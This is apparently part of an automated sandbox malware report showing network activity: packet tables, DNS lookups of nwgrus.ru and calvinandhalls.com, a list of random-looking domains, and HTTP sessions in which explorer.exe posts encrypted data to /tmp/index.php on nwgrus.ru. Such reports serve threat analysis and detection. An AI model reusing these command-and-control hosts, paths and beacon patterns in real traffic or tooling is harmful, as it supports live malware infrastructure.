Oct 3, 2024 02:55:09.932919979 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.932919979 CEST	49793	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:09.932969093 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:09.933007956 CEST	443	49793	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:12.851555109 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:12.856806993 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:12.856915951 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:12.858268023 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:12.858299971 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:12.863435030 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:12.863454103 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:14.179193020 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:14.179409027 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:14.179610014 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:14.179610014 CEST	49794	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:14.184751987 CEST	80	49794	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:26.356240034 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:26.356271982 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:26.356347084 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:26.356664896 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:26.356673956 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.271159887 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.271316051 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.276454926 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.276473999 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.276810884 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.283245087 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.283245087 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.283343077 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.953202963 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.953290939 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.953344107 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.953500986 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.953519106 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:27.953528881 CEST	49795	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:27.953533888 CEST	443	49795	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:30.051381111 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:30.056699038 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:30.056873083 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:30.057107925 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:30.057107925 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:30.062050104 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:30.062163115 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:31.392007113 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:31.392054081 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:31.392173052 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:31.392462015 CEST	49796	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:31.398541927 CEST	80	49796	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:43.353779078 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:43.353904009 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:43.354001045 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:43.354336977 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:43.354365110 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:43.983452082 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:43.983580112 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.006414890 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.006465912 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.006824017 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.012696981 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.012734890 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.012819052 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.353369951 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.353426933 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.353496075 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.353712082 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.353754997 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:44.353781939 CEST	49797	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:44.353796005 CEST	443	49797	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:47.172106981 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:47.915085077 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:47.915186882 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:47.915378094 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:47.915433884 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:47.920412064 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:47.920444012 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:49.226342916 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:49.226388931 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:49.226473093 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:49.226640940 CEST	49798	80	192.168.2.4	201.212.52.197
Oct 3, 2024 02:55:49.231765032 CEST	80	49798	201.212.52.197	192.168.2.4
Oct 3, 2024 02:55:59.984632969 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:59.984719992 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:55:59.984819889 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:59.985107899 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:55:59.985150099 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.585305929 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.585515976 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.588429928 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.588485003 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.588854074 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.600989103 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.600989103 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.601208925 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.871871948 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.872009039 CEST	443	49799	23.145.40.162	192.168.2.4
Oct 3, 2024 02:56:00.872313023 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.872313976 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:00.872313976 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:01.273555040 CEST	49799	443	192.168.2.4	23.145.40.162
Oct 3, 2024 02:56:01.273616076 CEST	443	49799	23.145.40.162	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 02:52:22.342329979 CEST	56114	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:52:22.475574017 CEST	53	56114	1.1.1.1	192.168.2.4
Oct 3, 2024 02:53:16.678008080 CEST	64852	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:53:16.711724043 CEST	53	64852	1.1.1.1	192.168.2.4
Oct 3, 2024 02:54:53.081018925 CEST	54866	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:54:54.089508057 CEST	54866	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:54:55.153078079 CEST	54866	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:54:55.331182003 CEST	53	54866	1.1.1.1	192.168.2.4
Oct 3, 2024 02:54:55.331223965 CEST	53	54866	1.1.1.1	192.168.2.4
Oct 3, 2024 02:54:55.331253052 CEST	53	54866	1.1.1.1	192.168.2.4
Oct 3, 2024 02:56:06.478717089 CEST	64202	53	192.168.2.4	1.1.1.1
Oct 3, 2024 02:56:06.504838943 CEST	53	64202	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 02:52:22.342329979 CEST	192.168.2.4	1.1.1.1	0x7cee	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:53:16.678008080 CEST	192.168.2.4	1.1.1.1	0x529c	Standard query (0)	calvinandhalls.com	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:53.081018925 CEST	192.168.2.4	1.1.1.1	0xeb2f	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:54.089508057 CEST	192.168.2.4	1.1.1.1	0xeb2f	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.153078079 CEST	192.168.2.4	1.1.1.1	0xeb2f	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:56:06.478717089 CEST	192.168.2.4	1.1.1.1	0x4823	Standard query (0)	globalviewsnature.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 02:52:15.731432915 CEST	1.1.1.1	192.168.2.4	0x3cd4	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:15.731432915 CEST	1.1.1.1	192.168.2.4	0x3cd4	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:17.043941021 CEST	1.1.1.1	192.168.2.4	0x857	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2024 02:52:17.043941021 CEST	1.1.1.1	192.168.2.4	0x857	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		187.199.200.127	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		220.125.3.190	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		200.63.106.141	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:52:22.475574017 CEST	1.1.1.1	192.168.2.4	0x7cee	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:53:16.711724043 CEST	1.1.1.1	192.168.2.4	0x529c	No error (0)	calvinandhalls.com		23.145.40.162	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		213.172.74.157	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331182003 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		213.172.74.157	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331223965 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		189.61.54.32	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		213.172.74.157	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		181.123.219.23	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		187.131.253.169	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:54:55.331253052 CEST	1.1.1.1	192.168.2.4	0xeb2f	No error (0)	nwgrus.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 3, 2024 02:56:06.504838943 CEST	1.1.1.1	192.168.2.4	0x4823	No error (0)	globalviewsnature.com		23.145.40.113	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

https:

calvinandhalls.com

dfddhctvosjupwbf.com

nwgrus.ru

xyqstrniaxmlxodr.org

fsupncxklgbjs.com

fcallrcdaowuy.net

sahyhdmmcvpatde.org

iqjnmccnpjtfli.org

jkxskklaphmdca.com

gmrribpoppj.com

fvhbfgwwnuywwuoj.com

wcoutespihad.com

pmsjsfqrqyrxj.org

etwlmvbptmw.org

hytemqketckrb.com

mgmthbbcemjcwdac.org

mclmeggoidfw.net

ywnrujdiubrl.net

llaskwsfjjpffj.com

nrxoolvtsikko.net

sjiiqjlirvpxdxa.org

vhprqvsefqk.com

vtfvgsblgpnxu.net

uxyakrfxevg.net

tltlkajmdifu.org

nsllnqutblayn.org

qqewfcdsrwqbg.org

pdbldukfsrlj.com

rgaydglbcbbvar.com

ticrvurjrjsf.com

drnoexjyrauki.com

wbbiwyhshhf.com

wvjpwlsevsc.net

vssaauwgvmedfq.net

pubortabbcvvvfcg.com

vfyrxdwalbtb.org

nyhrbrqisswma.com

mtigasxvtneuwtdj.org

frgbxqyrenbq.net

ahaddcjrcpv.net

iqyabdaoinn.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:22.482182026 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dfddhctvosjupwbf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: nwgrus.ru
Oct 3, 2024 02:52:22.482213974 CEST	349	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 4c ce f8 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA .[k,vuILt+dcHODldm~OrB%>.`>#B.tTj[0Qj*\|02qVqtE\$GS3
Oct 3, 2024 02:52:23.779000044 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:23.794410944 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xyqstrniaxmlxodr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: nwgrus.ru
Oct 3, 2024 02:52:23.794430017 CEST	262	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 22 36 b4 f4 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vu"6aaBq8sZY,ifLLyO0gY5(JQ7I%W%aDk7~"Q'`="]16CEe
Oct 3, 2024 02:52:24.904617071 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:24.989859104 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fsupncxklgbjs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: nwgrus.ru
Oct 3, 2024 02:52:24.989871025 CEST	221	OUT	Data Raw: 3b 6e 53 11 f1 bb 6c 27 ae ae c5 76 02 05 78 cc 7b 7d bb ec 6b 00 e5 67 0f 7d 7f 94 44 c3 c0 1a 9a 2d ce 2e 00 18 24 1d 9f 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 48 3f d9 a5 Data Ascii: ;nSl'vx{}kg}D-.$? 9Yt M@NA -[k,vuH?>XOR_Im$0%LTerAaV%2v%+TUqsC$^F"~IzGZZ+U`J'nm
Oct 3, 2024 02:52:26.182543993 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 03 Oct 2024 00:52:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	190.219.117.240	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 02:52:26.191899061 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fcallrcdaowuy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: nwgrus.ru
